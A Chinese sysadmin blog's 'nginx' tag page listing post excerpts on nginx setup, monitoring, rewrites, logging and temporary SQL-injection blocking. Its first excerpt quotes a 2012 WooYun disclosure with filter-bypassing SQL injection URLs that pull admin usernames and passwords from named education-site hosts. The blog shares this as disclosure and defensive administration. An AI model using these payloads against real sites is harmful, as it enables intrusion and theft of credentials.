漏洞编号:WooYun-2012-04939 详细说明: 因其中简单过滤括号和空格,导致可以绕过过滤进行注入。比如随便在教育厅主页打开几个网站测试。 主站:http://gov.e21.cn/school_show.php?college_id=96+/*!and*/+1=2+/*!uNioN*/+/*!seLecT*/+1,user_name,3,4,user_pwd,6,7,8,9,10,11,12,13,14+/*!from*/+admin 高中课改网:http://gzkg.e21.cn/content.php?id=1253+/*!aND*/1=2+/*!uNion*/+/*!sel… 继续阅读 没想到wooyun.org上榜被抓sql inject
标签: nginx
nginx
尝试mogilefs for nginx的模块
模块有个简单的文档 http://www.grid.net.ru/nginx/mogilefs.en.html 安装 #wget http://www.grid.net.ru/nginx/download/nginx_mogilefs_module-1.0.4.tar.gz #tar zxvf nginx_mogilefs_module-1.0.4.tar.gz #cd nginx-1.0.14 #./configure –prefix=/data/app/nginx –add-module=../nginx_mogilefs_module-1.0.4/ –with-debug #make &… 继续阅读 尝试mogilefs for nginx的模块
近幾日系統維護小節
近一段時間一直在做全省高一階段的綜合素質評價系統的運維,短時間內用戶幷發很高操作很多流量也比較大,在維護過程中一直跌跌撞撞遇到很多問題,目前已經告一段落。問題很多,收穫也很多,我想有必要系統的總結一下。 整體系統狀況如下: 主要功能是全省高中學生的網上素質評價,大約40w用戶,每個班內學生需要互評,以每個班60人計算,最大的互評表規模60*40w=2400w的規模。評價時間需要在15天完成,評價採用開放式,部份在學校機房集中填報,有條件也可在家自由填報,學生評價之後的修改沒有限制,個班老師需要網上對所有評價進行審核確認。 系統開發環境php+oracle,在前端採用一台千兆負載均衡設備,後端採… 继续阅读 近幾日系統維護小節
用nginx做一点sql-inject的临时处理
这几天sql-inject的量有些大,每天snort记录的扫描探测都有几万条。特别是有一些小分网站脚本陈旧,这方面的处理存在很大漏洞,的确存在一些sql-inject的漏洞,有些探测已经得到了web应用的用户管理表数据。 脚本众多,要协调程序部门修改是一个过程,很头疼。只好临时在nginx上做了一些URL判断,把符合规则的一些url访问导向到临时页面中。 nginx中内置的变量函数可以达到这个目的: nginx.conf# 定义一个错误吗和相应页面 error_page 519  … 继续阅读 用nginx做一点sql-inject的临时处理
在zabbix上监控nginx进程
由于大部分web服务器的apache都更换为了nginx,zabbix中以前http进程监控也需要调整了。 在zabbix中可以自定义监控变量,通过自己写的bash脚本来抓取相关信息返回给zabbix server,这里我们需要在运行zabbix agent的服务器上编辑/etc/zabbix/zabbix_agentd.conf,增加下行:UserParameter=nginx.connects,/data/shells/nginx_status.sh connections 其中nginx.connects是定义的zabbix agent变量,/data/shells/nginx_stat… 继续阅读 在zabbix上监控nginx进程
nginx的下载连接限制和防盗链
限制每个IP一个线程,每个线程20K/s限制;防治盗链,将盗链的URL显示为指定图片; 在171上测试通过。 一、下载限制。 http { limit_zone one $binary_remote_addr 10m; server { &… 继续阅读 nginx的下载连接限制和防盗链
Nginx的rewrite简单测试(存档)
下午做了一下nginx的简单rewrite测试,原来在kds.1vs1.cn上对apache做了rewrite,在转移到nginx之后,原有的rewrite规则不变,匹配规则写法变化不大。 在httpd.conf中的写法: RewriteEngine OnRewriteRule /index_([^/]*).html /templete1/index\.php\?itemID=$1 [L]RewriteRule /doc_([^/]*).html /goDoc\.php\?docID=$1 [L] 在nginx.conf中的写法: rewrite "/… 继续阅读 Nginx的rewrite简单测试(存档)
nginx的日志处理
在把apache迁移成nginx之后,就要着手解决web日志的问题了。 由于我们分域名网站众多,以前通过cronolog将apache的log自动按照yyyy-mm-dd截断成每天的各分网站日志,然后通过bash脚本使用awstat生成所有分网站的log分析页面,以便所有网站日志的统一管理和浏览。但是nginx的配置文件中不支持cronolog的管道,只好通过手动的方式来截取生成每天的各网站日志。 在nginx.conf中定义log: 在http{}内定义log格式:log_format combined '$remote_addr R… 继续阅读 nginx的日志处理
nginx初试及apache对比测试
nginx是个比较简便的httpserver,今天下午有空就试了下安装,包括php-fastcgi,并和apache做了一下对比测试。结果令人对nginx刮目相看,在html的测试中表现非常优秀。 nginx的wiki:http://wiki.codemongers.com 首先看看nginx的安装。 1.先安装php for FastCGI# tar zxvf php-5.2.1.tar.gz# ./configure –prefix=/opt/php-cgi –enable-fastcgi –with-gd –with-… 继续阅读 nginx初试及apache对比测试